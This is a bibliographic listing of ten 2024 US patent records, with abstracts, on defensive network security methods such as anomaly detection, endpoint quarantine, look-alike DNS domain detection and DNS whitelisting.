公开(公告)号：US20240364722A1

公开(公告)日：2024-10-31

申请号：US18308857

申请日：2023-04-28

Applicant: HEWLETT PACKARD ENTERPRISE DEVELOPMENT LP

Inventor： Nirmal Rajarathnam ,  Navaneethan Venugopal ,  Bhagvan Cheeyandria

IPC: H04L9/40

CPC classification number: H04L63/1425 ,  H04L63/145 ,  H04L63/20

Abstract: A process includes prioritizing candidate network traffic flow profiles. The prioritization includes associating perception scores with respective candidate network traffic flow profiles. Each candidate network traffic flow profile is a member of a profile group of a plurality of profile groups. The process includes associating weights with respective profile groups of the plurality of categories. The process includes, responsive to a network traffic flow, identifying, by a traffic analysis engine, a first observed profile of the network traffic flow corresponding to a first candidate network traffic flow profile. The process includes, based on the perception score associated the first candidate network traffic flow profile and the weight associated with the profile group in which the first candidate network traffic flow profile is a member, determining a policy score; and selecting, by the network analysis engine, a policy to be applied to the network traffic flow based on the policy score.

公开(公告)号：US12126638B2

公开(公告)日：2024-10-22

申请号：US17386295

申请日：2021-07-27

Applicant: ROYAL BANK OF CANADA

Inventor： Nariman Mammadli ,  Atanas Viyachki

IPC: H04L9/40 ,  G06F18/21

CPC classification number: H04L63/1425 ,  G06F18/217 ,  H04L63/1416 ,  H04L63/145 ,  H04L63/1466

Abstract: Systems and methods for adaptively identifying anomalous network communication traffic. The system includes a processor and a memory coupled to the processor. The memory includes processor-executable instructions that configure the processor to: obtain data associated with a sequence of network communication events; determine that the sequence of communication events is generated by a computing agent based on a symmetricity measure associated with the sequence of network communication events; generate a threat prediction value for the sequence of network communication events prior-generated by the computing agent based on a combination of the symmetricity measure and a randomness measure associated with the network communication events; and transmit a signal for communicating that the sequence of network communication events is a potential malicious sequence of network communication events based on the threat prediction value.

公开(公告)号：US12120519B2

公开(公告)日：2024-10-15

申请号：US17674285

申请日：2022-02-17

Applicant: Lookout, Inc.

Inventor： David Richardson ,  Ahmed Mohamed Farrakha ,  William Neil Robinson ,  Brian James Buck

IPC: H04W12/128 ,  G06F21/50 ,  G06F21/51 ,  G06F21/56 ,  H04L9/40 ,  H04W12/122 ,  H04W12/37

CPC classification number: H04W12/128 ,  G06F21/50 ,  G06F21/51 ,  H04L63/145 ,  H04W12/122 ,  H04W12/37 ,  G06F21/56 ,  G06F2221/033

Abstract: For increased security, a source is determined for software to be installed on a computing device. In one approach, a side-load server receives, from a mobile device, data regarding an application to be installed on the mobile device. The server determines a source of the application, then sends, to an authenticity server, data regarding the source. The server receives, from the authenticity server, a first state designation for the application. In response to receiving the first state designation, the server sets a second state designation, and sends the second state designation to the mobile device (e.g., to permit or block installation of the application).

公开(公告)号：US12113814B2

公开(公告)日：2024-10-08

申请号：US18520806

申请日：2023-11-28

Applicant: Kandji, Inc.

Inventor： Adam Pettit ,  Wesley Pettit ,  Mark Daughters ,  Brandon Modesitt

IPC: H04L9/40

CPC classification number: H04L63/1416 ,  H04L63/145

Abstract: A method involves receiving a plurality of security rules from a remote management platform at an endpoint detection and response (EDR) module at a user device. The EDR module subscribes to one or more event types at the user device. The EDR module receives a notification of an event corresponding to one of the subscribed event types. Upon determining that the event is associated with a file stored at the user device, the EDR module instantiates an event tracer tree that is associated with the file. The EDR module generates a file hash value for the file using the event tracer tree. Upon determining that the file hash value satisfies a security rule, the EDR module quarantines the file and reports that the file has been quarantined.

公开(公告)号：US12107883B2

公开(公告)日：2024-10-01

申请号：US17188601

申请日：2021-03-01

Applicant: Citrix Systems, Inc.

Inventor： Asterios Stergioudis

IPC: H04L9/40 ,  G06N20/00 ,  H04L67/14

CPC classification number: H04L63/145 ,  G06N20/00 ,  H04L67/14

Abstract: Described embodiments provide systems and methods for managing session accessed by a client device. The systems and methods can include one or more processors configured to receive data in a plurality of modalities corresponding to a plurality of features of a session for an entity accessed by a client device. The one or more processors can determine based on the data of the session and a distance model trained with historical data of the entity, a distance between a representation of the data of the session and a predetermined representation for the entity established based on the historical data of the entity. The one or more processors can compare the distance with a threshold established for the entity. The one or more processors can generate, based on the comparison between the distance with the threshold, an action to manage access by the client device to the session for the entity.

公开(公告)号：US12107876B2

公开(公告)日：2024-10-01

申请号：US17665218

申请日：2022-02-04

Applicant: Panasonic Intellectual Property Corporation of America

Inventor： Takeshi Kishikawa ,  Ryo Hirano ,  Tomoyuki Haga ,  Yoshihiro Ujiie

IPC: H04L9/40

CPC classification number: H04L63/1425 ,  H04L63/02 ,  H04L63/145

Abstract: The control network system is connected to electronic control unit(s) and a communication device, and includes security sensor(s) that transmits a security alert indicating that an indication of a security breach is detected to the network, if the indication is detected in at least one of the network, the electronic control unit(s), or the communication device. The intrusion path analysis device includes: an alert obtainer that obtains the security alert from the security sensor(s); an event obtainer that obtains an event history of an event that occurs in the control network system; and an intrusion path analyzer that performs an analysis on an intrusion path of an attack on the basis of the security alert, the event history, and an intrusion depth indicating an intrusion level to be assumed in a case the security alert occurs, and that outputs a result of the analysis.

公开(公告)号：US12107869B1

公开(公告)日：2024-10-01

申请号：US17153807

申请日：2021-01-20

Applicant: Anvilogic, Inc.

Inventor： Karthik Kannan ,  Deb Banerjee ,  Mackenzie Kyle ,  Benjamin Arnold ,  Kevin Gonzalez ,  Jeswanth Manikonda

IPC: H04L9/00 ,  H04L9/40

CPC classification number: H04L63/1416 ,  H04L63/105 ,  H04L63/1425 ,  H04L63/145 ,  H04L63/20

Abstract: A dynamic threat landscape to which computer resources of a specific enterprise are subject is tracked. Data feeds maintained by a security system of the enterprise are assessed. The effectiveness of data feed utilization by the security system is quantified, relative to the threat landscape. Threat detection rules deployed by the security system are assessed, and the effectiveness thereof by the security system is quantified. Processing capability of alerts generated by threat detection rules and threat response capability may also be assessed and quantified. The effectiveness of the security system as a whole is automatically quantified, based on the tracked threat landscape, the quantifications of the effectiveness of data feed utilization, threat detection rule utilization, processing capability of alerts generated by threat detection rules and/or threat response capability. Recommendations concerning more effectively protecting the enterprise against specific threats are output. Actions are automatically taken to mitigate specific threats.

公开(公告)号：US20240323223A1

公开(公告)日：2024-09-26

申请号：US18680878

申请日：2024-05-31

Applicant: Infoblox Inc.

Inventor： Vadym Tymchenko

IPC: H04L9/40 ,  H04L61/4511

CPC classification number: H04L63/145 ,  H04L61/4511 ,  H04L63/0236 ,  H04L63/0263 ,  H04L63/101

Abstract: Various techniques for detecting visual similarity between DNS fully qualified domain names (FQDNs) are disclosed. In some embodiments, a system, process, and/or computer program product for detecting visual similarity between DNS FQDNs includes receiving a DNS data stream, wherein the DNS data stream includes a DNS query and a DNS response for resolution of the DNS query; performing extended sequence alignment for each of the set of FQDNs to identify potential malware FQDNs for one or more target FQDNs based on a visual similarity for each domain in the DNS data stream; and classifying the set of domains as malware FQDNs or benign FQDNs based on results of the extended sequence alignment.

公开(公告)号：US12101336B2

公开(公告)日：2024-09-24

申请号：US17825120

申请日：2022-05-26

Applicant: Sophos Limited

Inventor： Biju Balakrishnan Nair ,  Brian Steven Vysocky, Jr.

IPC: H04L9/40 ,  G06F21/53 ,  G06F21/56

CPC classification number: H04L63/1408 ,  G06F21/53 ,  G06F21/567 ,  H04L63/1416 ,  H04L63/1425 ,  H04L63/1433 ,  H04L63/1441 ,  H04L63/145 ,  H04L63/20

Abstract: A threat management facility for an enterprise network integrates native threat management capabilities with threat data from a cloud service provider used by the enterprise. By properly authenticating to the cloud service and mapping data feeds from the cloud service to a native threat management environment, the threat management facility can extend threat detection and management capabilities beyond endpoint-centric techniques.

公开(公告)号：US12101322B2

公开(公告)日：2024-09-24

申请号：US17520394

申请日：2021-11-05

Applicant: Infoblox Inc.

Inventor： Renee Carol Burton

IPC: H04L29/06 ,  H04L9/40 ,  H04L12/911 ,  H04L29/12 ,  H04L47/70 ,  H04L61/4511

CPC classification number: H04L63/101 ,  H04L47/70 ,  H04L61/4511 ,  H04L63/0227 ,  H04L63/1425 ,  H04L63/145 ,  H04L63/1466 ,  H04L63/1483

Abstract: Techniques for smart whitelisting for Domain Name System (DNS) security are provided. In some embodiments, a system/process/computer program product for smart whitelisting for DNS security in accordance with some embodiments includes receiving a set of network related event data, wherein the set of network related event data includes Domain Name System (DNS) related event data; receiving a set of network related threat data, wherein the set of network related threat data includes DNS related threat data; and generating a whitelist using the set of network related event data and the set of network related threat data, wherein the whitelist includes a subset of network domains included in the DNS related event data based on a data driven model of the DNS related event data and the DNS related threat data.